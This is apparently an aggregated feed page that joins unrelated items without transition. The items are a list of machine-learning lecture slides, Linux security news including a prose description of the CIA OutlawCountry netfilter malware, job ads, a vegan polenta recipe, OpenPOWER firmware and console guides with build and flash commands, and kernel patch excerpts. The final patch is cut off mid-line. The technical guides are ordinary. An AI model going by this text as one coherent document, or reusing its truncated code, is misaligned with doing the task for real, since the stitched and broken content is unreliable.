(MPI for Intelligent Systems)
 Causality.
Slides here.
Stefanie Jegelka
(MIT)
 Submodularity.
Slides here.


Jure Leskovec
(Stanford)
Network Analysis.
Slides 1 2 3 4




Ruslan Salakhutdinov
(CMU)
Deep Learning.
Slides part 1 part 2


Suvrit Sra
(MIT)
Optimization.
Slides 1 2 3A 3B
Bharath Sriperumbudur
(PennState)
Kernel Methods.
Slides part 1 part 2 part 3


Max Welling
(Amsterdam)
Large Scale Bayesian Inference with an Application to Bayesian Deep Learning
Slides here.




Bernhard Schölkopf
(MPI for Intelligent Systems)
Introduction to ML and a talk on Causality.
Slides here.

h/t Russ





          Security: Systemd, ELSA, and OutlawCountry   

          Canonical Outs Important Kernel Update for All Supported Ubuntu Linux Releases   

After patching a recently discovered systemd vulnerability in Ubuntu 17.04 and Ubuntu 16.10, Canonical today released a new major kernel update for all of its supported Ubuntu Linux operating systems, including Ubuntu 17.04, Ubuntu 16.10, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 12.04 LTS (HWE), patching up to fifteen security flaws.

Read more


          Security: OutlawCountry, WatchGuard FUD, SambaCry FUD, Overhyped Systemd Bug   
  • OutlawCountry

    Today, June 29th 2017, WikiLeaks publishes documents from the OutlawCountry project of the CIA that targets computers running the Linux operating system. OutlawCountry allows for the redirection of all outbound network traffic on the target computer to CIA controlled machines for ex- and infiltration purposes. The malware consists of a kernel module that creates a hidden netfilter table on a Linux target; with knowledge of the table name, an operator can create rules that take precedence over existing netfilter/iptables rules and are concealed from a user or even the system administrator.

    The installation and persistence method of the malware is not described in detail in the document; an operator will have to rely on the available CIA exploits and backdoors to inject the kernel module into a target operating system. OutlawCountry v1.0 contains one kernel module for 64-bit CentOS/RHEL 6.x; this module will only work with default kernels. Also, OutlawCountry v1.0 only supports adding covert DNAT rules to the PREROUTING chain.

  • WatchGuard survey indicates Linux, Web servers becoming hot targets for cyber attacks [Ed: Watchguard is a Microsoft buddy from Seattle. Its own site says it "recently became an official member of the Microsoft Partner Network”. Watch out for press releases and 'journalists' who copy-paste their PR (we saw several). Anti-Linux FUD.]
  • The SambaCry scare gives Linux users a taste of WannaCry-Petya problems [Ed: only for those who mimic/simulate Windows]
  • Linux's systemd vulnerable to DNS server attack
  • Systemd Bug Lets Attackers Hack Linux Boxes via Malicious DNS Packets

          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Peppered Mexican Polenta Towers   
I had this dish in my head for about a week. It came once again, from gluten-free cooking, and I really like polenta anyway! My favorite way to eat it is crispy fried on the outside. I thought it would be delicious Mexican style over beans, so here we are! I also got to take advantage of the Farmer's Market and I got heirloom tomatoes and bell peppers at a *very* reasonable price, which I am psyched about! Called "Peppered" because I have mild bell peppers, fried jalapenos, and chipotle (smoked jalapeno) powder.

If you are going to make this, then do the polenta and marinate the tofu the day before. You may even do the salsa w/o the avocado and add it last minute. Don't be intimidated by the length of the recipe, it's just several simple components, and you can do it if I can! Keep polenta and tofu warm in the oven if you need to, while preparing the plates.




Peppered Mexican Polenta Stacks (Makes 4 servings with leftover polenta)

Tofu:
1 lb tofu, cut into 8 slabs and pressed
Tofu Marinade- Wheat Free Soy sauce, brown sugar, sherry(or tequila/alcohol/lime juice), cumin, smoked paprika, chipotle powder, onion powder, water, vegetable oil. Adjust to taste. Water should be used only if marinade needs to be mellowed. Marinate an hour minimum (I like overnight). When ready to prepare, just saute in peanut or vegetable oil. Keep it simple.

Polenta-
3 1/2 c water
1 c polenta corn grits (not instant grits, y'all!)
2 tsp vegan "chicken" broth bouillon*
1 scallion, minced
1/4 c loosely-packed cilantro leaves (measure out then mince)
1 Tbsp olive oil/margarine
salt to taste (I used about 1-2 tsp)

Heat water in a medium saucepan. Whisk in bouillon while heating and heat to boiling. *You can also use premade veggie broth or any other combo bouillon/water. I make mine weak for things like this. Whisk in polenta in a steady stream. Stir often. Add water if polenta becomes really thick. I did about 1/3 cup. Cover and turn heat down, cooking 15 min. Stir often. Add scallions/cilantro and olive oil/margarine and turn heat off. Stir once or twice while polenta cools for 10 minutes in pan. Pour into container and let come to room temperature, then refrigerate until completely firm all the way through. I would say 1 hour minimum in a shallow pan. From here you can cut into desired shape and fry until crispy on each side.

Note: You can use the tubes of polenta that you find in the produce section. However, making it at home is way less expensive and the 20 min you put in can really impress because you added the cilantro and scallion flavor/color.

Beans-
I usually take refried beans (I have red refried beans, Frijoles Rojos Volteados, Natura's brand) and add stock, but I added a little extra this time. I fried up some red onions and garlic, then blended them with the stock so it would be completely smooth. General ratio is 1 c broth to 1-16oz can beans. I also add a hunk of margarine for flavor/fat since we are using lard-free. Add salt if necessary. These simmer on low for about an hour. Be careful and go slow, the mixture will blend eventually.

Tomatoes-
Thick slices of heirloom sprinkled with salt and pepper. (I was going to broil these but they are fantastic by themselves.)

Peppers-
Roast 2 red and 2 green bell peppers. Put in a paper bag or plastic container with a lid and let cool. Skin and deseed. DO NOT rinse. Cut into strips to make sure each plate gets some of each pepper.

Jalapenos-
To keep gluten free, use a GF flour like rice flour. Just chop fresh jalapeno to desired shape (I like strips because it doesn't include seeds), roll in flour, then in soy buttermilk (soymilk plus a small amount of apple cider vinegar), then back in the rice flour, and fry. These are for garnishing the top. This is optional but it's fun and pretty and quick. It also adds a punch if your peppers are hot!

Sweet Avocado Salsa-
1 ripe avocado
1 ripe mango
cilantro
small amount minced red onion (couple Tbsp)
fresh lime juice
handful fresh cut corn kernels

Do your thang! Chop those avocados and the mango, mix all ingredients except avocado. I pulsed in food processor. Fold in avocado so it keeps its structure. Corn is optional, but I like the mixture, and raw corn is really sweet and it ties into the corn in the polenta.

Plate as desired! I did it like this:

Beans on the bottom, polenta, tofu, tomato, roasted red peppers, polenta, tofu, roasted red peppers, fried jalapenos.

My presentation was a little sloppy because we had 5 hungry tummies and I didn't want it to get cold!
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT
          OpenPOWER console implementations   

I often have folks asking how the text & video consoles work on OpenPOWER machines. Here's a bit of a rundown on how it's implemented, and what may seem a little different from x86 platforms that you may already be used to.

On POWER machines, we get the console up and working super early in the boot process. This means that we can get debug, error and state information out using text console with very little hardware initialisation, and in a human-readable format. So, we tend to use simpler devices for the console output - typically a serial UART - rather than graphical-type consoles, which require a GPU to be up and running. This keeps the initialisation code clean and simple.

However, we still want admins who are more used to a directly plugged-in keyboard & monitor to have a console too. More about that later though.

The majority of OpenPOWER platforms will rely on the attached baseboard management controller (BMC) to provide the UART console (as of November 2016: unless you've designed your own OpenPOWER hardware, this will be the case for you). This will be based on ASPEED's AST2400 or AST25xx system-on-chip devices, which provide a few methods of getting console data from the host to the BMC.

Between the host and the BMC, there's an LPC bus. The host is the master of the LPC bus, and the BMC the slave. One of the facilities that the BMC exposes over this bus is a set of UART devices. Each of these UARTs appears as a standard 16550A register set, so having the host interface to a UART is very simple.

As the host is booting, the host firmware will initialise the UART console, and start outputting boot progress data. First, you'll see the ISTEP messages from hostboot, then skiboot's "msglog" output, then the kernel output from the petitboot bootloader.

Because the UART is implemented by the BMC (rather than a real hardware UART), we have a bit of flexibility about what happens to the console data. On a typical machine, there are four ways of getting access to the console:

  • Direct physical connection: using the DB-9 RS232 port on the back of the machine;
  • Over network: using the BMC's serial-over-LAN interface, using something like ipmitool [...] sol activate;
  • Local keyboard/video/mouse: connected to the VGA & USB ports on the back of the machine, or
  • Remote keyboard/video/mouse: using "remote display" functionality provided by the BMC, over the network.

The first option is fairly simple: the RS232 port on the machine is actually controlled by the BMC, and not the host. Typically, the BMC firmware will just transfer data between this port and the LPC UART (which the host is interacting with). Figure 1 shows the path of the console data.

Figure 1: Local UART console.

The second is similar, but instead of the BMC transferring data between the RS232 port and the host UART, it transfers data between a UDP serial-over-LAN session and the host UART. Figure 2 shows the redirection of the console data from the host over LAN.

Figure 2: Remote UART console.

The third and fourth options are a little more complex, but basically involve the BMC rendering the UART data into a graphical format, and displaying that on the VGA port, or sending over the network. However, there are some tricky details involved...

UART-to-VGA mirroring

Earlier, I mentioned that we start the console super-early. This happens way before any VGA devices can be initialised (in fact, we don't have PCI running; we don't even have memory running!). This means that it's not possible to get these super-early console messages out through the VGA device.

In order to be useful in deployments that use VGA-based management though, most OpenPOWER machines have functionality to mirror the super-early UART data out to the VGA port. During this process, it's the BMC that drives the VGA output, rendering the incoming UART text data to the VGA device. Figure 3 shows the flow for this, with the BMC's graphics device rendering the text console to the graphical output.

Figure 3: Local graphical console during early boot.

In the case of remote access to the VGA device, the BMC takes the contents of this rendered graphic and sends it over the network, to a BMC-provided web application. Figure 4 illustrates the redirection to the network.

Figure 4: Remote graphical console during early boot, with graphics sent over the network

This means we have console output, but no console input. That's okay though, as this is purely to report early boot messages, rather than provide any interaction from the user.

Once the host has booted to the point where it can initialise the VGA device itself, it takes ownership of the VGA device (and the BMC relinquishes it). The first software on the host to start interacting with the video device is the Linux driver in petitboot. From there on, video output is coming from the host, rather than the BMC. Because we may have user interaction now, we use the standard host-controlled USB stack for keyboard & mouse control.

Figure 5: Local graphical console later in boot, once the host video driver has started.

Remote VGA console follows the same pattern - the BMC captures the video data that has been rendered by the GPU, and sends it over the network. In this case, the console input is implemented by virtual USB devices on the BMC, which appear as a USB keyboard and mouse to the operating system running on the host.

Figure 6: Remote graphical console later in boot, once the host video driver has started.

Typical console output during boot

Here are a few significant points of the boot process:

  3.60212|ISTEP  6. 3
  4.04696|ISTEP  6. 4
  4.04771|ISTEP  6. 5
 10.53612|HWAS|PRESENT> DIMM[03]=00000000AAAAAAAA
 10.53612|HWAS|PRESENT> Membuf[04]=0C0C000000000000
 10.53613|HWAS|PRESENT> Proc[05]=C000000000000000
 10.62308|ISTEP  6. 6

- this is the initial output from hostboot, doing early hardware initialisation in discrete "ISTEP"s

 41.62703|ISTEP 21. 1
 55.22139|htmgt|OCCs are now running in ACTIVE state
 63.34569|ISTEP 21. 2
 63.33911|ISTEP 21. 3
[   63.417465577,5] SkiBoot skiboot-5.4.0 starting...
[   63.417477129,5] initial console log level: memory 7, driver 5
[   63.417480062,6] CPU: P8 generation processor(max 8 threads/core)
[   63.417482630,7] CPU: Boot CPU PIR is 0x0430 PVR is 0x004d0200
[   63.417485544,7] CPU: Initial max PIR set to 0x1fff
[   63.417946027,5] OPAL table: 0x300c0940 .. 0x300c0e10, branch table: 0x30002000
[   63.417951995,5] FDT: Parsing fdt @0xff00000

- here, hostboot has loaded the next firmware stage, skiboot, and we're now executing that.

[   22.120063542,5] INIT: Waiting for kernel...
[   22.154090827,5] INIT: Kernel loaded, size: 15296856 bytes (0 = unknown preload)
[   22.197485684,5] INIT: 64-bit LE kernel discovered
[   22.218211630,5] INIT: 64-bit kernel entry at 0x20010000, size 0xe96958
[   22.247596543,5] OCC: All Chip Rdy after 0 ms
[   22.296864319,5] Free space in HEAP memory regions:
[   22.304756431,5] Region ibm,firmware-heap free: 9b4b78
[   22.322076546,5] Region ibm,firmware-allocs-memory@2000000000 free: 10cd70
[   22.341542329,5] Region ibm,firmware-allocs-memory@0 free: afec0
[   22.392470901,5] Total free: 11999144
[   22.419746381,5] INIT: Starting kernel at 0x20010000, fdt at 0x305dbae8 (size 0x1d251)   

- next, the skiboot firmware has loaded the petitboot bootloader kernel (in zImage.epapr format), and is setting up memory regions in preparation for running Linux.

zImage starting: loaded at 0x0000000020010000 (sp: 0x0000000020e94ed8)
Allocating 0x1545554 bytes for kernel ...
gunzipping (0x0000000000000000 <- 0x000000002001d000:0x0000000020e9238b)...done 0x13c0300 bytes

Linux/PowerPC load: 
Finalizing device tree... flat tree at 0x20ea1520
[   24.074353446,5] OPAL: Switch to little-endian OS
 -> smp_release_cpus()
spinning_secondaries = 159
 <- smp_release_cpus()
 <- setup_system() 

- we then get the output from the zImage wrapper, which expands the actual kernel code and executes it. In recent firmware builds, the petitboot kernel will suppress most of the Linux boot messages, so we should only see high-priority warnings or error messages.

Next up, the petitboot UI will be shown:

 Petitboot (v1.2.3-a976d01)                   8335-GCA         2108ECA
 ──────────────────────────────────────────────────────────────────────────────
  [Disk: sda1 / 590328e2-1095-4fe7-8278-0babaa9b9ca5]          
    Ubuntu, with Linux 4.4.0-47-generic (recovery mode)
    Ubuntu, with Linux 4.4.0-47-generic
    Ubuntu

  [Network: enP3p3s0f3 / 98:be:94:67:c0:1b]
    Ubuntu 14.04.x installer
    Ubuntu 16.04 installer
    test kernel



  System information
  System configuration
  Language
  Rescan devices
  Retrieve config from URL
 *Exit to shell                                                
 ──────────────────────────────────────────────────────────────────────────────
 Enter=accept, e=edit, n=new, x=exit, l=language, h=help

During Linux execution, skiboot will retain control of the UART (rather than exposing the LPC registers directly to the host), and provide a method for the Linux kernel to read and write to this console. That facility is provided by the OPAL_CONSOLE_READ and OPAL_CONSOLE_WRITE calls in the OPAL API.

Which one should we use?

We tend to prefer the text-based consoles for managing OpenPOWER machines - either the RS232 port on the machine for local access, or IPMI Serial over LAN (SOL) for remote access. Console connections then need much less bandwidth, have lower latency, and the console data takes a simpler path. Text consoles are also more reliable during low-level debugging, as serial access involves fewer components of the hardware, software and firmware stacks.

That said, the VGA mirroring implementation should still work well, and is also accessible remotely with current BMC firmware implementations. If your datacenter is not set up for local RS232 connections, you may want to use VGA for local access, and SOL for remote - or whatever works best in your situation.


          Kernel testing for OpenPOWER platforms   

Last week, Michael and I were discussing long-term Linux support for OpenPOWER platforms, particularly the concern about testing for non-IBM hardware. We'd like to ensure that the increasing range of OpenPOWER platforms, from different manufacturers, don't lose compatibility with the upstream Linux kernel.

Previously, there were only a few POWER vendors, producing a fairly limited range of hardware, so it was reasonable to get a decent amount of test coverage by booting the kernel on a small number of machines with diverse-enough components. Now, with OpenPOWER, machines are being built by different manufacturers, so it's becoming less feasible to do that coverage testing in a single lab.

To solve this, Chris, who has been running the jenkins setup on openpower.xyz, has added some kernel builds for the latest mainline kernel. We're using a .config that should be suitable for all OpenPOWER platforms. The idea here is to get as much of the OpenPOWER hardware community as possible to test the latest Linux kernel.

If you're an OpenPOWER vendor, I'd strongly suggest setting up some regular testing on this kernel. This means you'll catch any breakages before they affect users of your platform.

Setting up a test process

The jenkins build jobs expose a last-successful-build URL, allowing you to grab the bootable kernel image easily:

[Note that these are HTTPS links, and you should ensure that the certificates are correct for anything you download and boot!]

To help with testing, we've also produced a little root-filesystem image that can be booted with this kernel as an initramfs image. That's produced via a similar jenkins job.

To set up an automated test process for this kernel:

If you find a build that fails on your machine, please send us an email at linuxppc-dev@lists.ozlabs.org

Alternatively, if there's something extra you need in the kernel configuration or initramfs setup, let me know at jk@ozlabs.org.

Future work

To improve the testing coverage, we'd like to add some automated tests to the initramfs image, rather than just booting to a shell. Stay tuned for updates!


          Toolchains for OpenPower petitboot environments   

Since we're using buildroot for the OpenPower firmware build infrastructure, it's relatively straightforward to generate a standalone toolchain to build add-ons to the petitboot environment. This toolchain will allow you to cross-compile from your build host to an OpenPower host running the petitboot environment.

This is just a matter of using op-build's toolchain target, and specifying the destination directory in the BR2_HOST_DIR variable. For this example, we'll install into /opt/openpower/ :

sudo mkdir /opt/openpower/
sudo chown $USER /opt/openpower/
op-build BR2_HOST_DIR=/opt/openpower/ toolchain

After the build completes, you'll end up with a toolchain based in /opt/openpower.

Using the toolchain

If you add /opt/openpower/usr/bin/ to your PATH, you'll have the toolchain binaries available.

[jk@pecola ~]$ export PATH=/opt/openpower/usr/bin/:$PATH
[jk@pecola ~]$ powerpc64le-buildroot-linux-gnu-gcc --version
powerpc64le-buildroot-linux-gnu-gcc (Buildroot 2014.08-git-g80a2f83) 4.9.0
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Currently, this toolchain isn't relocatable, so you'll need to keep it in the original directory for tools to correctly locate other toolchain components.

OpenPower doesn't (yet) specify an ABI for the petitboot environment, so there are no guarantees that a petitboot plugin will be forwards- or backwards-compatible with other petitboot environments.

Because of this, if you use this toolchain to build binaries for a petitboot plugin, you'll need to either:

  • ensure that your op-build version matches the one used for the target petitboot image; or
  • provide all necessary libraries and dependencies in your distributed plugin archive.

We're working to address this though, by defining the ABI that will be regarded as stable across petitboot builds. Stay tuned for updates.

Using the toolchain for subsequent op-build runs

Because op-build has a facility to use an external toolchain, you can re-use the toolchain built above for subsequent op-build invocations, where you want to build actual firmware binaries. If you're using multiple op-build trees, or are regularly building from scratch, this can save a lot of time, as you don't need to continually rebuild the toolchain from source.

This is a matter of configuring your op-build tree to use an "External Toolchain", in the "Toolchain" screen of the menuconfig interface:

You'll need to set the toolchain path to the path you used for BR2_HOST_DIR above, with /usr appended. The other toolchain configuration parameters (kernel header series, libc type, features enabled) will need to match the parameters that were given in the initial toolchain build. Helpfully, the buildroot code will check that these match, and print an informative error message if there are any inconsistencies.

For the example toolchain built above, these are the full configuration parameters I used:

BR2_TOOLCHAIN=y
BR2_TOOLCHAIN_USES_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL=y
BR2_TOOLCHAIN_EXTERNAL_CUSTOM=y
BR2_TOOLCHAIN_EXTERNAL_PREINSTALLED=y
BR2_TOOLCHAIN_EXTERNAL_PATH="/opt/openpower/usr/"
BR2_TOOLCHAIN_EXTERNAL_CUSTOM_PREFIX="$(ARCH)-linux"
BR2_TOOLCHAIN_EXTERNAL_PREFIX="$(ARCH)-linux"
BR2_TOOLCHAIN_EXTERNAL_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL_HEADERS_3_15=y
BR2_TOOLCHAIN_EXTERNAL_CUSTOM_GLIBC=y
BR2_TOOLCHAIN_EXTERNAL_INET_RPC=y
BR2_TOOLCHAIN_EXTERNAL_CXX=y
BR2_TOOLCHAIN_EXTRA_EXTERNAL_LIBS=""
BR2_TOOLCHAIN_HAS_NATIVE_RPC=y
BR2_TOOLCHAIN_HAS_THREADS=y
BR2_TOOLCHAIN_HAS_THREADS_DEBUG=y
BR2_TOOLCHAIN_HAS_THREADS_NPTL=y
BR2_TOOLCHAIN_HAS_SHADOW_PASSWORDS=y
BR2_TOOLCHAIN_HAS_SSP=y

Once that's done, anything you build using that op-build configuration will refer to the external toolchain, and use that for the general build process.


          Custom kernels in OpenPower firmware   

As of commit 2aff5ba6 in the op-build tree, we're able to easily replace the kernel in an OpenPower firmware image.

This commit adds a new partition (called BOOTKERNEL) to the PNOR image, which provides the petitboot bootloader environment. Since it's now in its own partition, we can replace the image with a custom build. Here's a little guide to doing that, using as an example a separate branch of op-build that provides a little-endian kernel.

You can check if your currently-running firmware has this BOOTKERNEL partition by running pflash -i on the BMC. It should list BOOTKERNEL in the partition table listing:

# pflash -i
Flash info:
-----------
Name          = Micron N25Qx512Ax
Total size    = 64MB 
Erase granule = 4KB 

Partitions:
-----------
ID=00            part 00000000..00001000 (actual=00001000)
ID=01            HBEL 00008000..0002c000 (actual=00024000)
[...]
ID=11            HBRT 00949000..00ca9000 (actual=00360000)
ID=12         PAYLOAD 00ca9000..00da9000 (actual=00100000)
ID=13      BOOTKERNEL 00da9000..01ca9000 (actual=00f00000)
ID=14        ATTR_TMP 01ca9000..01cb1000 (actual=00008000)
ID=15       ATTR_PERM 01cb1000..01cb9000 (actual=00008000)
[...]
#  

If your partition table does not contain a BOOTKERNEL partition, you'll need to upgrade to a more recent PNOR image to proceed.

First (if you don't have one already), grab a suitable version of op-build. In this example, we'll use my le branch, which has little-endian support:

git clone --recursive git://github.com/jk-ozlabs/op-build.git
cd op-build
git checkout -b le origin/le
git submodule update

Then, prepare our environment and configure for the relevant platform - in this case, habanero:

. op-build-env
op-build habanero_defconfig

If you'd like to change any of the kernel config (for example, to add or remove drivers), you can do that now, using the 'linux-menuconfig' target. This is only necessary if you wish to make changes. Otherwise, the default kernel config will work.

op-build linux-menuconfig

Next, we build just the userspace and kernel parts of the firmware image, by specifying the linux26-rebuild-with-initramfs build target:

op-build linux26-rebuild-with-initramfs

If you're using a fresh op-build tree, this will take a little while, as it downloads and builds a toolchain, userspace and kernel. Once that's complete, you'll have a built kernel image in the output tree:

 output/build/images/zImage.epapr

Transfer this file to the BMC, and flash using pflash. We specify the -P <PARTITION> argument to write to a single PNOR partition:

pflash -P BOOTKERNEL -e -p /tmp/zImage.epapr

And that's it! The next boot will use your newly-built kernel in the petitboot bootloader environment.

Out-of-tree kernel builds

If you'd like to replace the kernel from op-build with one from your own external source tree, you have two options: either point op-build at your own tree, or build your own kernel using the initramfs that op-build has produced.

For the former, you can override certain op-build variables to reference a separate source. For example, to use an external git tree:

op-build LINUX_SITE=git://github.com/jk-ozlabs/linux LINUX_VERSION=v3.19

See Customising OpenPower firmware for other examples of using external sources in op-build.

The latter option involves building a kernel completely outside of op-build, but referencing the initramfs created by op-build (which is in output/images/rootfs.cpio.xz). From your kernel source directory, add the CONFIG_INITRAMFS_SOURCE argument, specifying the relevant initramfs. For example:

make O=obj ARCH=powerpc \
    CONFIG_INITRAMFS_SOURCE=../op-build/output/images/rootfs.cpio.xz

          Customising OpenPower firmware   

Now that the OpenPower sources are available, it's possible to build custom firmware images for OpenPower machines. Here's a little guide to show how that's done.

The build process

OpenPower firmware has a number of different components, and some infrastructure to pull it all together. We use buildroot to do most of the heavy lifting, plus a little wrapper, called op-build.

There's a README file containing build instructions in the op-build git repository, but here's a quick overview:

To build an OpenPower PNOR image from scratch, we'll need a few prerequisites (assuming recent Ubuntu):

sudo apt-get install cscope ctags libz-dev libexpat-dev libc6-dev-i386 \
    gcc g++ git bison flex gcc-multilib g++-multilib libxml-simple-perl \
    libxml-sax-perl

Then we can grab the op-build repository, along with the git submodules:

git clone --recursive git://github.com/open-power/op-build.git

set up our environment and configure using the "palmetto" machine configuration:

. op-build-env
op-build palmetto_defconfig

and build:

op-build

After a while (there is quite a bit of downloading to do on the first build), the build should complete successfully, and you'll have a PNOR image built in output/images/palmetto.pnor.

If you have an existing op-build tree around (colleagues working on OpenPower perhaps?), you can share or copy the dl/ directory to save on download time.

The op-build command is just a shortcut for a make in the buildroot tree, so the general buildroot documentation applies here too. Just replace "make" with "op-build". For example, we can enable a verbose build with:

op-build V=1

Changing the build configuration

Above, we used a palmetto_defconfig as the base buildroot configuration. This defines overall options for the build; things like:

  • Toolchain details used to build the image
  • Which firmware packages are used
  • Which packages are used in the petitboot bootloader environment
  • Which kernel configuration is used for the petitboot bootloader environment

This configuration can be changed through buildroot's menuconfig UI. To adjust the configuration:

op-build menuconfig

And buildroot's configuration interface will be shown:

As an example, let's say we want to add the "file" utility to the petitboot environment. To do this, we can navigate to that option in the Target Packages section (Target Packages → Shell and Utilities → file), and enable the option:

Then exit (saving changes) and rebuild:

op-build

- the resulting image will have the file command present in the petitboot shell environment.

Kernel configuration

There are a few other configuration targets to influence the build process; the most interesting for our case will be the kernel configuration. Since we use petitboot as our bootloader, it requires a Linux kernel for the initial bootloader environment. The set of drivers in this kernel will dictate which devices you'll be able to boot from.

So, if we want to enable booting from a new device, we'll need to include an appropriate driver in the kernel. To adjust the kernel configuration, use the linux-menuconfig target:

op-build linux-menuconfig

- which will show the standard Linux "menuconfig" interface:

From here, you can alter the kernel configuration. Once you're done, save changes and exit. Then, to build the new PNOR image:

op-build

Customised packages

If you have a customised version of one of the packages used in the OpenPower build, you can easily tell op-build to use your local package. There are a number of package-specific make variables documented in the buildroot generic package reference, the most interesting ones being the _VERSION and _SITE variables.

For example, let's say we have a custom petitboot tree that we want to use for the build. We've committed our changes in the petitboot tree, and want to build a new PNOR image. For the sake of this example, the petitboot commit we'd like to build is git SHA 2468ace0, and our custom petitboot tree is at /home/jk/devel/petitboot.

To build a new PNOR image with this particular petitboot source, we need to specify a few buildroot make variables:

op-build PETITBOOT_SITE=/home/jk/devel/petitboot \
    PETITBOOT_SITE_METHOD=git \
    PETITBOOT_VERSION=2468ace0

This is what these variables are doing:

  • PETITBOOT_SITE=/home/jk/devel/petitboot - tells op-build where our custom source tree is. This could be a git URL or a local path.
  • PETITBOOT_SITE_METHOD=git - tells op-build that PETITBOOT_SITE is a git tree. If we were using a git:// URL for PETITBOOT_SITE, then this variable would be set automatically.
  • PETITBOOT_VERSION=2468ace0 - tells op-build which version of petitboot to checkout. This can be any commit reference that git understands.

The same method can be used for any of the other packages used during build. For OpenPower builds, you may also want to use the SKIBOOT_* and LINUX_* variables to include custom skiboot firmware and kernel in the build.

If you'd prefer to test new sources without committing to git, you can use _SITE_METHOD=local. This will copy the source tree (defined by _SITE) to the buildroot tree and use it directly. For example:

op-build SKIBOOT_SITE=/home/jk/devel/skiboot \
    SKIBOOT_SITE_METHOD=local

- will build the current (and not-necessarily-committed) sources in /home/jk/devel/skiboot. Note that buildroot has no way to tell if your code has changed with _SITE_METHOD=local. If you re-build with this, it's safer to clean the relevant source tree first:

op-build skiboot-dirclean

          Re: [PATCH][iio-next] iio: adc: stm32: make array stm32h7_adc_ckmo ...   
Jonathan Cameron writes: (Summary) On Wed, 28 Jun 2017 16:35:04 +0200
Fabrice Gasnier <fabrice.gasnier@st.com> wrote: applied to the togreg branch of iio.git and pushed out as testing for the autobuilders to play with it.
Thanks,
Jonathan
More majordomo info at http://vger.kernel.org/majordomo-info.html
          [PATCH 2/2] mfd: intel_soc_pmic: Differentiate between Bay and Che ...   
Hans de Goede writes: (Summary)
 !id->driver_data)
+	/*
+	 * There are 2 different Crystal Cove PMICs a Bay Trail and Cherry
+	 * Trail version, use _HRV to differentiate between the 2.
+	 */
+	}
+
+	switch (hrv) {
+	case BYT_CRC_HRV:
+		config = &intel_soc_pmic_config_byt_crc;
 #if defined(CONFIG_ACPI)
 static const struct acpi_device_id intel_soc_pmic_acpi_match[] = {
-	{"INT33FD", (kernel_ulong_t)&intel_soc_pmic_config_byt_crc},
+	{ "INT33FD" },
 	{ },
 };
          Re: [PATCH v2 1/3] dt-bindings: adc: mt7622: add binding document   
Jonathan Cameron writes: On Wed, 28 Jun 2017 11:46:22 -0500
Rob Herring <robh@kernel.org> wrote:
Acked-by: Rob Herring <robh@kernel.org>
Applied to the togreg branch of iio.git and pushed out as testing for the autobuilders to play with it.
Thanks,
Jonathan

          Re: [PATCH v2] pata_imx: print error message on platform_get_irq f ...   
Vladimir Zapolskiy writes: (Summary) Silva wrote:
if (!priv)
this patch is wrong, I've explained why at https://lkml.org/lkml/2017/6/30/144
Please handle -EPROBE_DEFER case, when your change adds the second (redundant) error level message printed to the kernel log.
--
With best wishes,
Vladimir

          gpt copying problem   
On kernel 4.11.7-200.fc25.x86_64 I'm having a problem copying Windows 10 installation files to a pendrive formatted as GPT with a single FAT32 partition. When I copy files, it usually stops around 5% (of space) and doesn't proceed further. I used two pendrives (4GB and 8GB) and it always fails. Any clues? Using dd works just fine, but I can't use it with this iso.
          [tip:perf/core] tools include: Add byte-swapping macros to kernel.h   
tip-bot for Adrian Hunter writes: (Summary)
 #ifndef UINT_MAX
 #define UINT_MAX (~0U)
@@ -67,12 +69,33 @@
 #endif
 #endif
-/*
- * Both need more care to handle endianness
- * (Don't use bitmap_copy_le() for now)
- */
-#define cpu_to_le64(x) (x)
-#define cpu_to_le32(x) (x)
+#if __BYTE_ORDER == __BIG_ENDIAN
+#define cpu_to_le16 bswap_16
+#define cpu_to_le32 bswap_32
+#define cpu_to_le64 bswap_64
+#define le16_to_cpu bswap_16
+#define le32_to_cpu bswap_32
+#define le64_to_cpu bswap_64
+#define cpu_to_be16
+#define cpu_to_be32
+#define cpu_to_be64
+#define be16_to_cpu
+#define be32_to_cpu
+#define be64_to_cpu
+#else
+#define cpu_to_le16
+#define cpu_to_le32
+#define cpu_to_le64
+#define le16_to_cpu
+#define le32_to_cpu
+#define le64_to_cpu
+#define cpu_to_be16 bswap_